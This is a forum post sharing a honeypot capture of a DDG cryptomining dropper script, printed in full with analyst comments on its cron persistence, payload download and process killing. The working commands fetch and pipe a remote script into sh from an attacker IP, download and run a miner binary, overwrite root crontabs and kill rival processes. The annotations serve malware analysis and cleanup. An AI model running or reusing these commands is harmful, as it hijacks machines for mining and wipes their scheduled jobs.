蜜罐捕获
DDG挖矿脚本
cmsfree 2019-06-28 09:30:36 1065人浏览

URL:http://110.40.14.13:8000/i.sh


# Analyst annotations on the captured dropper script. Every command line below is
# kept exactly as captured; only the comments are added.
#
# Flow: (1) write root cron entries, (2) pick a writable directory, (3) download
# and start the "mcuifa3" binary, (4) kill processes with related names,
# (5) install the same cron line through crontab(1).

# Append the usual binary directories to PATH so curl/wget/ps resolve even when
# the script runs with a minimal environment (e.g. from cron).
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

# --- Persistence via cron spool files ---
# /var/spool/cron/root is first truncated to a single empty line, so any
# legitimate root cron entries stored there are lost. A job is then appended that
# fires every 15 minutes: it tries mcuifa3 at four absolute paths and, only if
# every one of them fails, fetches i.sh again with curl (wget as fallback).
# Whatever the parenthesised group writes to stdout is piped into sh.
# The finished file is copied to /var/spool/cron/crontabs/root as well, so both
# spool layouts carry the entry (RHEL-style and Debian-style paths, respectively).
# Host artifacts to check: both spool files, and the strings "mcuifa3" and
# ":8000/i.sh" inside them.
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/root
echo "*/15 * * * * (/usr/bin/mcuifa3||/usr/libexec/mcuifa3||/usr/local/bin/mcuifa3||/tmp/mcuifa3||curl -fsSL -m180 http://110.40.14.13:8000/i.sh||wget -q -T180 -O- http://110.40.14.13:8000/i.sh) | sh" >> /var/spool/cron/root
cp -f /var/spool/cron/root /var/spool/cron/crontabs/root

# --- Choose a working directory ---
# Start in /tmp, then probe three system directories by creating a marker file
# named "writeable"; each successful touch is followed by a cd into that
# directory. The shell therefore ends up in the last directory in the list that
# accepted the write (/usr/bin is tried last), or stays in /tmp if none did.
# The marker files are removed afterwards; a short-lived file called "writeable"
# in these directories is a file-system indicator of this step.
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

# --- Download and start the payload ---
# The chosen directory is appended to PATH.
export PATH=$PATH:$(pwd)
# If no process line in the ps listing contains "mcuifa3", the local copy is
# deleted, which forces the download below on this run.
ps auxf | grep -v grep | grep mcuifa3 || rm -rf mcuifa3
# When no local copy exists, fetch ddgs.<machine architecture from uname -m> from
# the /static/4003/ path on the same host and save it as "mcuifa3". curl is tried
# first and wget is the fallback; both allow up to 1800 seconds.
# NOTE(review): "4003" looks like a build or version directory; confirm against
# other captures of this family.
if [ ! -f "mcuifa3" ]; then
    curl -fsSL -m1800 http://110.40.14.13:8000/static/4003/ddgs.$(uname -m) -o mcuifa3||wget -q -T1800 http://110.40.14.13:8000/static/4003/ddgs.$(uname -m) -O mcuifa3
fi
# Mark the file executable, then try the four candidate locations in order until
# one of them exits successfully.
chmod +x mcuifa3
/usr/bin/mcuifa3||/usr/libexec/mcuifa3||/usr/local/bin/mcuifa3||/tmp/mcuifa3

# --- Kill processes with related names ---
# Sends SIGKILL to every process whose ps line contains one of seven names
# (mcuibcb..mcuibce, mcuifa0..mcuifa2). The match is a plain substring grep over
# the whole ps line, so unrelated processes that merely mention these strings in
# their arguments would be killed too.
# NOTE(review): the naming pattern suggests these are earlier builds of the same
# payload being replaced by mcuifa3; the script itself does not say so.
ps auxf | grep -v grep | grep mcuibcb | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep mcuibcc | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep mcuibcd | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep mcuibce | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep mcuifa0 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep mcuifa1 | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep mcuifa2 | awk '{print $2}' | xargs kill -9

# --- Persistence via crontab(1) ---
# Replaces the invoking user's entire crontab with the same 15-minute job, this
# time through the crontab command rather than by writing spool files directly.
# The curl flags appear in a different order here ("-m180 -fsSL") than in the
# spool-file entry above ("-fsSL -m180"), so a string signature built from one
# line will not match the other exactly.
# Cleanup has to cover this crontab, both spool files and the mcuifa3 binary in
# all four locations; otherwise the remaining cron job re-fetches the script.
echo "*/15 * * * * (/usr/bin/mcuifa3||/usr/libexec/mcuifa3||/usr/local/bin/mcuifa3||/tmp/mcuifa3||curl -m180 -fsSL http://110.40.14.13:8000/i.sh||wget -q -T180 -O- http://110.40.14.13:8000/i.sh) | sh" | crontab -
dirshell 2019-07-02 14:17:10 回复
试试